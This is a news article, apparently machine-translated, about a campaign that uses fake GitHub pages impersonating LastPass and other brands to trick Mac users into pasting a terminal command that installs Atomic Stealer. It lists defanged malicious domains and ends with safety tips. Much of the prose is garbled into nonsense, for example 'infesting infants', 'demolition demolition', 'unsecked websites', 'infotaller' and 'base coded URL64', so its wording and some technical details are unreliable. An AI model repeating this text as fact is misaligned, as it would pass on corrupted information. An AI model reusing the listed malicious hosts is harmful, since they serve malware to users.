- Robador atomic malware is installed in silence through false pages of GITHUB aimed at MAC users
- The attackers create multiple github accounts to avoid the demolition demolition
- Copy -checking users of unsecked websites are at risk of severe system commitment
Cybersecurity researchers warn Apple Mac users about a campaign that uses fraudulent github repositories to propagate malware and infesting infants.
The research of threat intelligence analysts, mitigation and escalation (time) of Lastpass discovered that the attackers are making people go through known companies to convince people to download false Mac software.
Two fraudulent pages of Github that intend to offer LastPass for Mac were first seen on September 16, 2025 under the username “Methopmduck476”.
How the attack chain works
While these particular pages have been eliminated, the incident suggests a broader pattern that continues to evolve.
The false pages of github included links labeled as “Install Lastpass in MacBook”, which redirected to hxxps: // ahoastock825[.]GITHUB[.]IO/.github/Lastpass.
From there, users were sent to Macprograms-Pro[.]com/mac-git-2-download.html and told him to paste a command in the terminal of his Mac.
That command used a curl application to obtain a base coded URL64 that decoded Bonoud[.]com/get3/install.sh.
Then, the script delivered a “update” payload that ATOMIC Stealer (Malware Amos) installed in the TEMP.
Atomic Stealer, who has been active since April 2023, is a known infotaller used by groups of financial crimes motivated financially.
Researchers have linked this campaign to many other false repositories that go through companies that range from financial institutions to productivity applications.
The list of specific names includes 1Password, Robinhood, Citibank, Docker, Shopify, Basecamp and many others.
The attackers seem to create multiple github user names to avoid demolition, using search engines optimization to boost their malicious links in search results in Google and Bing.
This technique increases the possibilities that Mac users looking for legitimate downloads are first found with fraudulent pages.
Lastpass states that he is “actively monitoring this campaign” while working in demolition and sharing compromise indicators to help others detect threats.
The use of github pages by the attackers reveals both the convenience and the risks of community platforms.
Fraudulent repositories can be configured rapidly, and although Github can eliminate them, attackers often return under new aka.
This cycle raises questions about how effectively these platforms can protect users.
How to stay safe
- Just download verified sources software to avoid the risks of malware and ransomware.
- Avoid copying unknown websites commands to avoid the execution of the unauthorized code.
- Keep macOS and all updated installed software to reduce vulnerabilities.
- Use the best antivirus or safety software that includes ransomware protection to block threats.
- Enable regular system backups to recover files if ransomware or malware attack.
- Stay skeptical of unexpected links, emails and emerging windows to minimize exposure.
- Monitor the Official Notices of Trust Suppliers for updates and appropriate security guidance.
- Configure strong and unique passwords and enable the authentication of two factors for important accounts.
